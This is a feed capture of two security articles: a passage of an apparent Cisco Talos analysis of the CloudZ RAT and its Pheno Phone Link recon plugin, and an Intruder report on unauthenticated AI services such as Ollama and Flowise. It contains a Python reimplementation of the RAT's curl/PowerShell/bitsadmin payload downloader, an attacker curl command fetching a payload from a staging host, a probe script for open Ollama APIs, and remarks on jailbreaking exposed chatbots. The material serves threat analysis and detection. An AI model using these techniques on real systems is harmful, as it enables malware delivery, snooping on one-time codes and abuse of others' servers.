| Rk0= | FM | File management operations (e.g., deletefile) |
| TE4= | LN | Unknown |
| TXNn | Msg | Send message to C2 |
| RXJyb3I= | Error | Error reporting back to C2 |
| cmVj | rec | Screen recording |
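The matching step above can be sketched as a minimal dispatcher: the Base64 identifiers from the configuration are decoded, then incoming C2 commands are looked up against them. The handler bodies here are placeholders, not CloudZ's real implementations:

```python
# Minimal dispatcher sketch using a few of the Base64 identifiers from the
# table above. Handlers are placeholders for demonstration only.
import base64

ENCODED_COMMANDS = ["cG9uZw==", "UElORyE=", "Q0xPU0U=", "UnVuU2hlbGw="]
COMMAND_TABLE = {base64.b64decode(c).decode(): c for c in ENCODED_COMMANDS}

def dispatch(received):
    """Match a received command against the decoded identifiers."""
    if received not in COMMAND_TABLE:
        return "unknown"
    if received == "PING!":
        return "pong"              # heartbeat reply
    if received == "CLOSE":
        return "terminating"       # placeholder for process termination
    return f"handled:{received}"   # placeholder for the remaining handlers
```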

The RAT employs several methods to download and execute plugins. The plugin download feature uses a three-method fallback approach. It first checks for the presence of the curl utility; if found, it attempts to download the file from a specified URL to a target path while following redirects. If curl is missing or the command fails, it falls back to PowerShell and tries to download the file with the Invoke-WebRequest cmdlet. If that also fails, it executes a final method that uses the LOLBin “bitsadmin” to download and save the plugin payloads to the victim machine.  
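The control flow of that fallback chain can be sketched as follows. The command lines are modeled on the behavior described above (and the curl invocation shown later in the report) but are simplified; this is not the RAT's embedded PowerShell:

```python
# Sketch of the three-stage fallback: curl, then PowerShell's
# Invoke-WebRequest, then bitsadmin. The runner is injectable so the
# control flow can be exercised without touching the network.
import subprocess

def fallback_download(url, dest, run=subprocess.run):
    attempts = [
        ["curl", "-L", "-o", dest, url],
        ["powershell", "-Command",
         f"Invoke-WebRequest -Uri '{url}' -OutFile '{dest}'"],
        ["bitsadmin", "/transfer", "job", url, dest],
    ]
    for cmd in attempts:
        try:
            if run(cmd, capture_output=True).returncode == 0:
                return cmd[0]          # which tool succeeded
        except FileNotFoundError:
            continue                    # tool absent, try the next method
    return None
```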

Figure 11. CloudZ’s embedded PowerShell command with three different approaches to download operation.

Talos observed in telemetry data that the attacker downloaded and implanted the Pheno plugin from the staging server using the following curl command: 

curl -L -o C:\Windows\TEMP\pheno.exe hxxps[://]orange-cell-1353[.]hellohiall[.]workers[.]dev/pheno.exe

Pheno plugin to perform the Phone Link application recon 

In this intrusion, Talos observed that the attacker used a plugin called Pheno to perform reconnaissance of the Windows Phone Link application on the victim machine.  

Pheno is designed to detect whether a user is currently syncing their mobile device to a Windows machine through the Phone Link application. It scans all running processes for specific keywords such as "YourPhone," "PhoneExperienceHost," or "Link to Windows," and, if matches are found, logs their process IDs and file paths to files named “phonelink-<COMPUTERNAME>.txt” created in two staging folders: 

  •  C:\programdata\Microsoft\feedback\cm 
  •  %TEMP%\Microsoft\feedback\cm 
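A simplified model of that scan is sketched below. The real plugin enumerates live processes; here the process list is passed in as a parameter so the matching logic is self-contained, and the file layout follows the naming described above:

```python
# Simplified model of Pheno's process scan. The process list is supplied
# by the caller rather than enumerated from the OS, for illustration.
import os

PHONE_LINK_KEYWORDS = ("YourPhone", "PhoneExperienceHost", "Link to Windows")

def scan_for_phone_link(processes):
    """processes: iterable of (pid, image_path). Returns matching entries."""
    hits = []
    for pid, path in processes:
        if any(k.lower() in path.lower() for k in PHONE_LINK_KEYWORDS):
            hits.append((pid, path))
    return hits

def log_hits(hits, folder):
    """Write '<pid> <path>' lines to phonelink-<COMPUTERNAME>.txt."""
    name = f"phonelink-{os.environ.get('COMPUTERNAME', 'HOST')}.txt"
    out = os.path.join(folder, name)
    with open(out, "w") as f:
        for pid, path in hits:
            f.write(f"{pid} {path}\n")
    return out
```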
Figure 11. Pheno recon plugin that monitors an active PC-to-phone bridge through Phone Link application. 

After checking for Phone Link processes and writing its results, Pheno performs a secondary check that reads back the contents of the previously written files and searches for the keyword "proxy" in a case-insensitive manner. The plugin performs this check because the Microsoft Phone Link application creates a local proxy connection to relay traffic between the PC and the paired mobile device. The presence of "proxy" in the output files, whether written by the current or a previous execution of the Pheno plugin, indicates that a Phone Link session is actively routing traffic through its relay channel.  

When the keyword is detected, the Pheno plugin writes "Maybe connected" to its output file in the staging folders, which ultimately allows the attacker, via the CloudZ RAT, to potentially monitor SMS or OTP messages that appear in the Phone Link application. 
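That second-stage check can be sketched as a short read-back routine; the exact file handling is an assumption, but the case-insensitive "proxy" search and the "Maybe connected" marker follow the description above:

```python
# Sketch of Pheno's second-stage check: re-read a previously written log,
# search case-insensitively for "proxy", and append "Maybe connected".
from pathlib import Path

def check_proxy_marker(log_path):
    p = Path(log_path)
    if p.exists() and "proxy" in p.read_text(errors="replace").lower():
        with p.open("a") as f:
            f.write("Maybe connected\n")
        return True
    return False
```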

Figure 12. Pheno checking for a previous instance of PC-to-phone bridge through Phone Link application. 

Coverage

The following ClamAV signatures detect and block this threat: 

  • Win.Packed.Msilheracles-10030690-0 
  • Win.Trojan.CloudZRAT-10059935-0 
  • Win.Trojan.CloudZRAT-10059959-0 

The following Snort rules (SIDs) detect and block this threat: 

  • Snort 2: 66409, 66410, 66408 
  • Snort 3: 301492, 66408 

Indicators of compromise (IOCs) 

The IOCs for this threat are available at our GitHub repository here.



from Cisco Talos Blog https://ift.tt/wMZeYEB
via IFTTT

We Scanned 1 Million Exposed AI Services. Here's How Bad the Security Actually Is

While the software industry has made genuine strides over the past few decades to deliver products securely, the furious pace of AI adoption is putting that progress at risk. Businesses are moving fast to self-host LLM infrastructure, drawn by the promise of AI as a force multiplier and the pressure to deliver more value faster. But speed is coming at the expense of security.

In the wake of the ClawdBot fiasco (the viral self-hosted AI assistant that's averaging an eye-watering 2.6 CVEs per day), the Intruder team wanted to investigate how bad the security of AI infrastructure actually is.

To scope the attack surface, we used certificate transparency logs to pull just over 2 million hosts with 1 million exposed services. What we found wasn’t pretty. In fact, the AI infrastructure we scanned was more vulnerable, exposed, and misconfigured than any other software we've ever investigated.

No authentication by default

It didn’t take long to spot an alarming pattern: a significant number of hosts had been deployed straight out of the box, with no authentication in place. Looking into the source code revealed why: authentication simply isn't enabled by default in many of these projects. 

Real user data and company tooling were sitting exposed to anyone who looked. In the wrong hands, the consequences range from reputational damage to full compromise.

Here are some of the most striking examples of what was exposed.

Freely accessible chatbots

A number of instances involved chatbots that left user conversations exposed. One example, based on OpenUI, exposed a user's full LLM conversation history. It might seem relatively innocent on the surface, but chat histories in enterprise environments can reveal a lot.

More concerning were generic chatbots hosting a wide range of models — including multimodal LLMs — freely available to use. Malicious users can jailbreak most models to bypass safety guardrails for nefarious purposes — like generating illegal imagery, or soliciting advice with intent to commit a crime — and do so without fear of repercussion, since they're using someone else's infrastructure. This isn't hypothetical. People are finding creative ways to abuse company chatbots to access more capable models without paying or having requests logged to their own accounts.

There were also some questionable chatbots exposing large volumes of personal NSFW conversations. If that wasn't bad enough, the software running the Claude-powered goon-bots also disclosed their API keys in plaintext.

Wide open agent management platforms

We also discovered exposed instances of agent management platforms, including n8n and Flowise. Some instances that users clearly thought were internal had been exposed to the internet without authentication. One of the most egregious examples was a Flowise instance that exposed the entire business logic of an LLM chatbot service.

Its credential list was exposed too. Flowise was hardened enough not to reveal the stored values to an unauthenticated visitor, which limits the immediate damage, but an attacker could still use the tools connected to those credentials to exfiltrate sensitive information.

This is what makes these platforms particularly dangerous. There's a distinct absence of proper access management controls in AI tooling, meaning access to a bot that's integrated with a third-party system often means access to everything it touches.

In another example, the setup exposed a number of internet parsing tools and potentially dangerous local functions, such as file writes and code interpreting, making server-side code execution a realistic prospect.

We identified over 90 exposed instances across sectors such as government, marketing, and finance. All of those chatbots, their workflows, prompts, and outward access were open. An attacker could modify the workflows, redirect traffic, expose user data, or poison responses. 

Saying hello to unsecured Ollama APIs

One of the more surprising findings was the sheer number of exposed Ollama APIs accessible without authentication, with a model connected. We fired a single prompt ("Hello") to every server that listed a connected model, to see if we’d be prompted to authenticate. Of the 5,200+ servers queried, 31% answered. 
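A probe of this kind can be sketched against Ollama's documented HTTP API: GET /api/tags lists the models a server has available, and POST /api/generate runs a prompt. The host below is a placeholder (11434 is Ollama's default port), and nothing is contacted unless a server is actually listening there:

```python
# Hypothetical sketch of a single-prompt Ollama probe. An unauthenticated
# server will answer both endpoints; the host value is a placeholder.
import json
import urllib.request

OLLAMA_HOST = "http://127.0.0.1:11434"   # placeholder; Ollama's default port

def build_probe_payload(model, prompt="Hello"):
    """Request body for Ollama's /api/generate endpoint."""
    return {"model": model, "prompt": prompt, "stream": False}

def probe_ollama(host=OLLAMA_HOST, timeout=10):
    """List models via /api/tags, then send one prompt to the first model."""
    tags = json.load(urllib.request.urlopen(f"{host}/api/tags", timeout=timeout))
    models = [m["name"] for m in tags.get("models", [])]
    if not models:
        return None                      # no connected model to query
    req = urllib.request.Request(
        f"{host}/api/generate",
        data=json.dumps(build_probe_payload(models[0])).encode(),
        headers={"Content-Type": "application/json"},
    )
    return json.load(urllib.request.urlopen(req, timeout=timeout)).get("response")
```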

The responses gave a window into what these APIs were being used for. We couldn't morally explore any further, but the implications are far-reaching. A few examples:

"Greetings, Master. Your command is my law. What is your desire? Speak freely. I am here to fulfill it, without hesitation or question."

"I am here to assist you in any way I can with your health and wellbeing issues. Whether it's anxiety, sleep problems, or other concerns, don't hesitate to ask me for help."

"Welcome! I'm an AI assistant integrated with our cloud management systems. I can help you with operational tasks, infrastructure deployment, and service queries."

Ollama doesn't store messages directly, so there's no immediate risk of conversation data being exposed. But many of these instances were wrapping paid frontier models from Anthropic, Deepseek, Moonshot, Google, and OpenAI. Of all the models identified across all servers, 518 were wrapping well-known frontier models.

Insecure by design

After triaging the results, it was clear that some of the tech warranted a closer look. We spent time analyzing a subset of the applications in a lab environment — and found repeated insecure patterns throughout:

  • Poor deployment practices: Insecure defaults, misconfigured Docker setups, hardcoded credentials, applications running as root
  • No authentication on fresh installs: Many projects drop users straight into a high-privilege account with full management access
  • Hardcoded and static credentials: Embedded in setup examples and docker-compose files rather than generated on installation
  • New technical vulnerabilities: Within a couple of days of lab work, we had already found arbitrary code execution in one popular AI project

These misconfigurations are made even worse when agents have access to tools like code interpretation. The blast radius gets significantly larger when sandboxing is weak, and the infrastructure isn't sitting in a DMZ.

Speed is winning. Security is lagging behind

Some of the projects powering LLM infrastructure have clearly abandoned decades of hard-won security best practices in favour of shipping fast. That said, it's not purely a vendor problem. The speed of AI adoption and the pressure to beat competitors to market are what’s driving it.

Don't wait for an attacker to find your exposed AI infrastructure first. Intruder finds misconfigurations and shows you what's visible from the outside.

This article is a contributed piece from one of our valued partners.



from The Hacker News https://ift.tt/OVwm1tn
via IFTTT